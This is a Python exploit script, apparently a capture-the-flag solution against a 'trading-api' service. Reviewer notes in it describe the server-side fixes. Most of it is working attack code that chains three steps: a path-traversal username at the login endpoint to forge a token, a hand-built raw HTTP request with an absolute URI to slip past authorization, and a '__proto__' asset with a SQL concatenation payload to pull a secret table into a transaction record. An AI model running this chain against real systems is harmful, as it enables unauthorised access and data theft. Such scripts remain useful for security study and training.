#!/usr/bin/env python3
import argparse
import requests  # third-party HTTP client (not stdlib)
import json
from urllib.parse import quote
from pwn import remote, log  # third-party pwntools: raw TCP client and logger
def authn_bypass(base, additional_data=''):
    """Obtain a token from ``/api/auth/login`` using a crafted username.

    The username sent is ``../../health?<additional_data>`` with the fixed
    password ``x``; the ``token`` field of the JSON response is returned.

    Args:
        base: ``scheme://host:port`` prefix of the target, no trailing slash.
        additional_data: text appended to the username after the ``?``.

    Returns:
        The value of ``token`` in the response body.

    Raises:
        json.JSONDecodeError if the body is not JSON; KeyError if it has no
        ``token`` key (e.g. an error response, since the status code is not
        checked).
    """
    # NOTE(review): the username carries ``../..`` segments, so this only
    # succeeds if the server interpolates the username into a URL or file
    # path without normalising it. The server-side fix is to validate the
    # username against a strict allow-list pattern and never build routes
    # or paths from caller-supplied strings.
    r = requests.post(f'{base}/api/auth/login', json={
        'username': f'../../health?{additional_data}',
        'password': 'x',
    })
    # No timeout and no status check: requests blocks indefinitely by default.
    return json.loads(r.text)['token']
def request_bypass_authz(host, port, method, path, token, body=''):
    """Send one hand-built HTTP/1.1 request over a plain TCP socket.

    The request line uses ``path`` verbatim (the caller passes an absolute
    URI, see create_tx), with a ``host`` header of ``host``, ``connection:
    close``, and an ``authorization`` header carrying ``token`` unchanged.

    Args:
        host: TCP host to connect to (also used for the ``host`` header).
        port: TCP port.
        method: HTTP method placed in the request line.
        path: request-target placed in the request line, unmodified.
        token: value of the ``authorization`` header.
        body: request body (str); its length is declared in ``content-length``.

    Returns:
        Everything after the first ``\\r\\n\\r\\n`` of the response, decoded
        as UTF-8. Chunked transfer encoding is not handled.

    Raises:
        IndexError if the response has no header/body separator.
    """
    # pwntools TCP connection, no TLS; log level 'error' silences its banner.
    c = remote(host, port, level='error')
    # Built by hand rather than via requests so the request-target is sent
    # exactly as given. NOTE(review): presumably an authorization layer in
    # front of the API matches on the request-target differently from the
    # backend router; the defensive fix is to canonicalise the request-target
    # once (origin-form only) before any authorization decision is made.
    req = (f'{method} {path} HTTP/1.1\r\n' +
           f'host: {host}\r\n' +
           'connection: close\r\n' +
           f'authorization: {token}\r\n' +
           # len(body) counts characters; a non-ASCII body would understate
           # the byte length produced by encode('utf-8') below.
           f'content-length: {len(body)}\r\n' +
           '\r\n' +
           body)
    c.send(req.encode('utf-8'))
    # recvall() reads until the server closes (hence 'connection: close');
    # the socket is not explicitly closed here.
    return c.recvall().decode('utf-8').split('\r\n\r\n')[1]
def create_tx(host, port, token, asset, action):
    """PUT ``/api/priv/assets/<asset>/<action>`` via request_bypass_authz.

    ``asset`` and ``action`` are percent-encoded with urllib.parse.quote
    before being placed in the path. The request-target is the absolute URI
    on the fixed host ``tuandv.com`` regardless of ``host``, while the TCP
    connection goes to ``host:port``.

    Returns:
        The ``id`` field of the JSON response body.

    Raises:
        json.JSONDecodeError / KeyError if the body is not JSON or lacks ``id``.
    """
    res = request_bypass_authz(host, port, 'PUT', f'http://tuandv.com/api/priv/assets/{quote(asset)}/{quote(action)}', token)
    return json.loads(res)['id']
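def get_tx(host, port, token, tx_id, *, timeout=30):
    """Fetch ``/api/transactions/<tx_id>`` and return the parsed JSON body.

    Args:
        host: target host name.
        port: target port.
        token: value sent verbatim in the ``authorization`` header (over plain
            ``http://``, so it travels in the clear).
        tx_id: transaction id; converted to str and percent-encoded.
        timeout: seconds to wait for connect and read. requests has no
            default timeout, so the original call could block indefinitely
            on an unresponsive server.

    Returns:
        The decoded JSON response body.

    Raises:
        requests.Timeout on a slow or silent server; json.JSONDecodeError if
        the body is not JSON (the status code is not checked).
    """
    url = f'http://{host}:{port}/api/transactions/{quote(str(tx_id))}'
    r = requests.get(url, headers={
        'authorization': token,
    }, timeout=timeout)
    return json.loads(r.text)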
def exploit(host, port):
    """Chain the three request steps against ``host:port`` and log the result.

    1. authn_bypass with ``::txId`` appended to the traversal username.
    2. create_tx with asset ``__proto__`` and an action value that is a
       quote-and-concatenate SQL fragment.
    3. get_tx on the returned id; ``username`` from character 13 onward is
       logged as the secret.

    Args:
        host: target host name.
        port: target port (int).
    """
    log.info('Creating JWT')
    # NOTE(review): ``::txId`` lands after the ``?`` in the username; what the
    # server does with it is not visible here — confirm against the target's
    # login/health handler.
    token = authn_bypass(f'http://{host}:{port}', additional_data='::txId')
    log.info(f'Token: {token}')
    # The action value only has an effect if the server splices ``action``
    # into a SQL string; bound parameters (never string concatenation) are
    # the fix. ``__proto__`` as the asset name suggests an object-key trick on
    # the server, which cannot be verified from this script.
    tx_id = create_tx(host, port, token, '__proto__', "'||(select secret_haha from secret_haha)||'")
    log.info(f'Created transaction: {tx_id}')
    transaction = get_tx(host, port, token, tx_id)
    log.info(f'Transaction: {transaction}')
    # [13:] drops a 13-character prefix of the stored username; the prefix
    # itself is not visible here — presumably the literal text preceding the
    # concatenated value.
    flag = transaction['username'][13:]
    log.success(f'Secret in database: {flag}')
def main():
    """Parse ``host`` and ``port`` from the command line and run exploit()."""
    arg_parser = argparse.ArgumentParser(description='trading-api exploit')
    arg_parser.add_argument('host', help='Host name')
    arg_parser.add_argument('port', type=int, help='Port')
    options = arg_parser.parse_args()
    exploit(options.host, options.port)


if __name__ == "__main__":
    main()